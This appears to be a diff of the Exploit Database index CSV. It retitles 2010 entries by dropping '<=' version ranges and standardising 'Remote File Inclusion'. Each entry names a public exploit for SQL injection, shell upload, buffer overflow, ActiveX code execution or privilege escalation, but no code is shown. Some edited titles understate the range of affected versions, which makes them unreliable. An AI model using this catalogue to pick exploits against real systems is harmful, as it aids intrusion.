Oliva",linux,dos,0 +11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service PoC (0Day)",2010-01-06,"Pietro Oliva",linux,dos,0 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor Shell Upload",2010-01-06,j4ck,php,webapps,0 11046,platforms/windows/local/11046.py,"Quick Player 1.2 -Unicode BoF - bindshell",2010-01-06,sinn3r,windows,local,0 11047,platforms/php/webapps/11047.txt,"Zeeways Technology (product_desc.php) SQL Injection",2010-01-07,Gamoscu,php,webapps,0 @@ -10168,7 +10168,7 @@ id,file,description,date,author,platform,type,port 11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - DoS PoC",2010-01-07,"t-bag YDteam",windows,dos,0 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Shell Upload",2010-01-07,Yozgat.Us,php,webapps,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 -11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 - Multiple Permanent XSS (0Day)",2010-01-07,emgent,php,webapps,80 +11060,platforms/php/webapps/11060.txt,"Drupal 6.15 - Multiple Permanent XSS (0Day)",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla Component Regional Booking (id) Blind SQL Injection",2010-01-07,"Hussin X",php,webapps,0 11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec PoC (0Day)",2010-01-08,superli,windows,dos,0 11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 - (print_view) Blind SQL Injection",2010-01-08,Red-D3v1L,php,webapps,0 @@ -10201,7 +10201,7 @@ id,file,description,date,author,platform,type,port 11101,platforms/hardware/webapps/11101.txt,"D-Link Routers - Authentication Bypass",2010-01-10,"SourceSec DevTeam",hardware,webapps,0 11103,platforms/windows/dos/11103.html,"VLC Player 0.8.6i - ActiveX DoS PoC",2010-01-10,"D3V!L FUCKER and germaya_x",windows,dos,0 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x File Upload",2010-01-11,Cyber_945,php,webapps,0 -11106,platforms/multiple/dos/11106.bat,"Nuked KLan <= 1.7.7 & <= SP4 DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 +11106,platforms/multiple/dos/11106.bat,"Nuked KLan 1.7.7 & <= SP4 DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - (SQL/XSS) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload",2010-01-11,R3d-D3V!L,php,webapps,0 @@ -10221,7 +10221,7 @@ id,file,description,date,author,platform,type,port 11133,platforms/windows/dos/11133.pl,"NPlayer - (.dat Skin) Local Heap Overflow PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - DB Download",2010-01-13,indoushka,asp,webapps,0 11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 -11136,platforms/php/webapps/11136.txt,"Public Media Manager SQLi Vulnerabilities",2010-01-13,"learn3r hacker",php,webapps,0 +11136,platforms/php/webapps/11136.txt,"Public Media Manager - SQLi Vulnerabilities",2010-01-13,"learn3r hacker",php,webapps,0 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - (.ini) Local Stack Buffer Overflow PoC",2010-01-14,"fl0 fl0w",windows,local,0 11140,platforms/php/webapps/11140.txt,"Joomla Component com_articlemanager SQL Injection",2010-01-14,FL0RiX,php,webapps,0 @@ -10234,12 +10234,12 @@ id,file,description,date,author,platform,type,port 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 & 2.0 - Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 -11152,platforms/windows/local/11152.py,"Google SketchUp <= 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 +11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0 11155,platforms/php/webapps/11155.txt,"Transload Script Upload",2010-01-16,DigitALL,php,webapps,0 -11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE <= 0.7.2 - Multiple LFI",2010-01-16,"cr4wl3r ",php,webapps,0 -11157,platforms/php/webapps/11157.txt,"MoME CMS <= 0.8.5 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 -11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS <= 3 B1 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 +11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple LFI",2010-01-16,"cr4wl3r ",php,webapps,0 +11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 +11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11159,platforms/php/webapps/11159.txt,"DasForum (layout) Local File Inclusion Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Buffer OverFlow Exploit (SEH)",2010-01-16,Red-D3v1L,windows,local,0 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 @@ -10254,7 +10254,7 @@ id,file,description,date,author,platform,type,port 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec PoC (0Day)",2010-01-17,superli,windows,remote,0 11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX - Remote Exec PoC (0Day)",2010-01-17,superli,windows,remote,0 11174,platforms/windows/local/11174.c,"VLC 0.8.6 a/b/c/d - (.ASS) Buffer Overflow Exploit (Win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 -11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer <= 5.9.14.1246 - ActiveX Remote Exec PoC (0Day)",2010-01-17,superli,windows,dos,0 +11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec PoC (0Day)",2010-01-17,superli,windows,dos,0 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection",2010-01-17,FL0RiX,php,webapps,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - BoF",2010-01-18,"John Babio",windows,remote,0 @@ -10265,7 +10265,7 @@ id,file,description,date,author,platform,type,port 11185,platforms/php/webapps/11185.html,"al3jeb script Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 11186,platforms/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL injection",2010-01-18,"Ivan Huertas",multiple,webapps,0 11187,platforms/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps,0 -11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Include (RFI)",2010-01-18,kaMtiEz,php,webapps,0 +11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Inclusion",2010-01-18,kaMtiEz,php,webapps,0 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 @@ -10276,7 +10276,7 @@ id,file,description,date,author,platform,type,port 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0 -11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0 +11203,platforms/multiple/remote/11203.py,"Pidgin MSN 2.6.4 File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0Day)",2010-01-20,Dz_attacker,windows,remote,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,"cr4wl3r ",windows,local,0 @@ -10286,7 +10286,7 @@ id,file,description,date,author,platform,type,port 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,anonymous,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla Component com_book SQL Injection",2010-01-21,Evil-Cod3r,php,webapps,0 11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 - ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 -11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server <= 1.9.8/Win32 - CSRF",2010-01-21,"cp77fk4r ",windows,webapps,0 +11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - CSRF",2010-01-21,"cp77fk4r ",windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - (defer)Remote Buffer Overflow PoC",2010-01-21,SkuLL-HackeR,windows,dos,0 11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 @@ -10300,7 +10300,7 @@ id,file,description,date,author,platform,type,port 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - (.mp3) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - (.mp3 /.pls) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin User)",2010-01-22,Stack,windows,local,0 -11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 - shdrv.sys Local kernel ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 +11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - shdrv.sys Local kernel ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0 11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection",2010-01-23,alnjm33,php,webapps,0 @@ -10310,7 +10310,7 @@ id,file,description,date,author,platform,type,port 11239,platforms/php/webapps/11239.txt,"Joomla (JBDiary) BLIND SQL Injection Vulnerabilities",2010-01-23,B-HUNT3|2,php,webapps,0 11240,platforms/php/webapps/11240.txt,"OpenDb 1.5.0.4 - Multiple LFI",2010-01-23,"ViRuSMaN ",php,webapps,0 11243,platforms/windows/webapps/11243.txt,"Joomla (com_mochigames) SQL Injection",2010-01-24,B-HUNT3|2,windows,webapps,0 -11244,platforms/php/webapps/11244.txt,"Silverstripe <= 2.3.5 - CSRForgery and Open Redirection Vulnerabilities",2010-01-24,"cp77fk4r ",php,webapps,0 +11244,platforms/php/webapps/11244.txt,"Silverstripe 2.3.5 - CSRForgery and Open Redirection Vulnerabilities",2010-01-24,"cp77fk4r ",php,webapps,0 11245,platforms/windows/dos/11245.txt,"Firefox 3.6 - (XML parser) Memory Corruption PoC/DoS",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service PoC",2010-01-24,d3b4g,windows,dos,0 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow PoC",2010-01-24,Debug,windows,dos,0 @@ -10380,7 +10380,7 @@ id,file,description,date,author,platform,type,port 11326,platforms/php/webapps/11326.txt,"cityadmin (links.php) Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 11327,platforms/php/webapps/11327.txt,"myBusinessAdmin (content.php) Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 11328,platforms/windows/remote/11328.py,"UplusFtp Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 -11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - Remote SQL Injection",2010-02-04,alnjm33,php,webapps,0 +11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,php,webapps,0 11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - 'Login.DO' SQL Injection",2010-02-04,"Asheesh Anaconda",windows,webapps,0 11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 reversible encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 11332,platforms/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution DoS Exploit",2010-02-05,"cr4wl3r ",windows,dos,0 @@ -10391,12 +10391,12 @@ id,file,description,date,author,platform,type,port 11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory corruption Heap BoF Exploit",2010-02-06,TecR0c,windows,dos,0 11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Remote File Upload",2010-02-06,anonymous,php,webapps,0 -11341,platforms/php/webapps/11341.txt,"ShopEx Single <= 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0 +11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local DoS",2010-02-06,"Nishant Das Patnaik",windows,dos,0 11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Pre-Authentication DoS (PoC)",2010-02-07,loneferret,windows,dos,0 11344,platforms/php/webapps/11344.txt,"WSN Guest Database Disclosure",2010-02-07,"HackXBack ",php,webapps,0 -11345,platforms/php/webapps/11345.txt,"Zen Tracking <= 2.2 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 -11346,platforms/php/webapps/11346.txt,"Baal Systems <= 3.8 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 11347,platforms/windows/dos/11347.html,"Safari 4.0.4 + Firefox 3.5.7 + SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0 @@ -10404,12 +10404,12 @@ id,file,description,date,author,platform,type,port 11351,platforms/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos,0 11352,platforms/php/webapps/11352.txt,"Joomla Component com_productbook SQL Injection",2010-02-07,snakespc,php,webapps,0 11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple CSRF Vulnerabilities",2010-02-07,"Milos Zivanovic ",php,webapps,0 -11354,platforms/php/webapps/11354.txt,"Killmonster <= 2.1 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 -11355,platforms/php/webapps/11355.txt,"EncapsCMS <= 0.3.6 - (config[path]) Remote File Include",2010-02-07,"cr4wl3r ",php,webapps,0 -11356,platforms/php/webapps/11356.txt,"Rostermain <= 1.1 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11355,platforms/php/webapps/11355.txt,"EncapsCMS 0.3.6 - (config[path]) Remote File Inclusion",2010-02-07,"cr4wl3r ",php,webapps,0 +11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 11357,platforms/php/webapps/11357.txt,"Uiga Business Portal SQL/ XSS",2010-02-07,"Sioma Labs",php,webapps,0 11358,platforms/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,"mc2_s3lector ",php,webapps,0 -11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Include",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0 +11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Inclusion",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0 11360,platforms/php/webapps/11360.txt,"Blue Dove SQL Injection",2010-02-08,"HackXBack ",php,webapps,0 11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,"ViRuSMaN ",asp,webapps,0 11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow PoC (0Day)",2010-02-09,"fl0 fl0w",windows,dos,0 @@ -10418,13 +10418,13 @@ id,file,description,date,author,platform,type,port 11366,platforms/php/webapps/11366.txt,"Newsletter Tailor Database Backup Dump",2010-02-09,"ViRuSMaN ",php,webapps,0 11367,platforms/php/webapps/11367.txt,"Newsletter Tailor (Auth Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,"HackXBack ",php,webapps,0 -11369,platforms/asp/webapps/11369.txt,"MOJO's IWms <= 7 SQL Injection & Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 +11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 SQL Injection & Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow Exploit (0Day)",2010-02-09,"fl0 fl0w",windows,local,0 11374,platforms/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,windows,dos,0 11375,platforms/php/webapps/11375.txt,"Zomorrod CMS SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 11376,platforms/php/webapps/11376.txt,"Fonts Site Script Remote File Disclosure",2010-02-09,JIKO,php,webapps,0 11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload",2010-02-09,JIKO,php,webapps,0 -11378,platforms/php/webapps/11378.txt,"Newsletter Tailor 0.2.0 - RFI",2010-02-09,snakespc,php,webapps,0 +11378,platforms/php/webapps/11378.txt,"Newsletter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,php,webapps,0 11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - opml File Buffer Overflow Exploit",2010-02-09,"fl0 fl0w",windows,local,0 11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 11382,platforms/php/webapps/11382.txt,"eSmile Script (index.php) SQL Injection",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10439,7 +10439,7 @@ id,file,description,date,author,platform,type,port 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - DoS",2010-02-11,"cp77fk4r ",php,dos,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script Admin Bypass and File Upload",2010-02-11,JIKO,php,webapps,0 -11399,platforms/php/webapps/11399.txt,"myPHP Guestbook <= 2.0.4 Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 +11399,platforms/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 @@ -10455,12 +10455,12 @@ id,file,description,date,author,platform,type,port 11412,platforms/php/webapps/11412.txt,"Trade Manager Script SQL Injection",2010-02-11,JaMbA,php,webapps,0 11413,platforms/windows/local/11413.pl,"CastRipper 2.50.70 - (.asx) Playlist Stack Overflow Exploit",2010-02-12,"Jordi Chancel",windows,local,0 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0 -11415,platforms/php/webapps/11415.txt,"Izumi <= 1.1.0 - (RFI/LFI) Multiple Include",2010-02-12,"cr4wl3r ",php,webapps,0 +11415,platforms/php/webapps/11415.txt,"Izumi 1.1.0 - (RFI/LFI) Multiple Include",2010-02-12,"cr4wl3r ",php,webapps,0 11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection",2010-02-12,Red-D3v1L,php,webapps,0 11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow Exploit (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0 11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 -11425,platforms/php/webapps/11425.txt,"daChooch Remote SQL Injection",2010-02-12,snakespc,php,webapps,0 +11425,platforms/php/webapps/11425.txt,"daChooch SQL Injection",2010-02-12,snakespc,php,webapps,0 11426,platforms/multiple/dos/11426.txt,"Browser address bar characters into a small feature",2010-02-12,"Pouya Daneshmand",multiple,dos,0 11427,platforms/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 11429,platforms/php/webapps/11429.txt,"Vito CMS SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps,0 @@ -10477,9 +10477,9 @@ id,file,description,date,author,platform,type,port 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQLi",2010-02-14,Thibow,php,webapps,0 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - (druckansicht.php) SQL Injection",2010-02-14,Lo$T,php,webapps,0 -11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery Remote SQL Injection",2010-02-14,snakespc,php,webapps,0 +11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery SQL Injection",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla (Jw_allVideos) Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 -11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection",2010-02-14,snakespc,php,webapps,0 +11449,platforms/php/webapps/11449.txt,"Joomla com_videos SQL Injection",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0 @@ -10511,13 +10511,13 @@ id,file,description,date,author,platform,type,port 11481,platforms/php/webapps/11481.txt,"intuitive (form.php) SQL Injection",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 11482,platforms/php/webapps/11482.txt,"Nabernet (articles.php) SQL Injection",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 11483,platforms/php/webapps/11483.txt,"Joomla Component com_acteammember SQL Injection",2010-02-17,"ALTBTA ",php,webapps,0 -11484,platforms/php/webapps/11484.txt,"uGround <= 1.0b SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 +11484,platforms/php/webapps/11484.txt,"uGround 1.0b SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11485,platforms/php/webapps/11485.txt,"Multiple File Attachments Mail Form Pro 2.0 - WebShell upload",2010-02-17,EgoPL,php,webapps,0 11486,platforms/php/webapps/11486.txt,"PHPIDS 0.4 - Remote File Inclusion",2010-02-17,eidelweiss,php,webapps,0 11487,platforms/php/webapps/11487.txt,"Auktionshaus 4 - news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11488,platforms/php/webapps/11488.txt,"Auktionshaus Gelb 3 - news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11489,platforms/php/webapps/11489.txt,"Erotik Auktionshaus news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 -11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire <= 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps,0 +11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps,0 11491,platforms/multiple/local/11491.rb,"iTunes 9.0.1 - (.pls) Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local,0 11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control DoS (Stack overflow)",2010-02-18,wirebonder,windows,dos,0 11494,platforms/php/webapps/11494.txt,"Joomla Component com_otzivi Local File Inclusion",2010-02-18,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10596,25 +10596,25 @@ id,file,description,date,author,platform,type,port 11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - (.orb) Local Universal SEH Overflow Exploit (0Day)",2010-02-26,mr_me,windows,local,0 11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo news.php - SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 BETA (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 -11584,platforms/php/webapps/11584.txt,"Project Man <= 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 -11585,platforms/php/webapps/11585.txt,"phpCDB <= 1.0 - Local File Include",2010-02-27,"cr4wl3r ",php,webapps,0 -11586,platforms/php/webapps/11586.txt,"phpRAINCHECK <= 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 -11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0 +11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 +11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,"cr4wl3r ",php,webapps,0 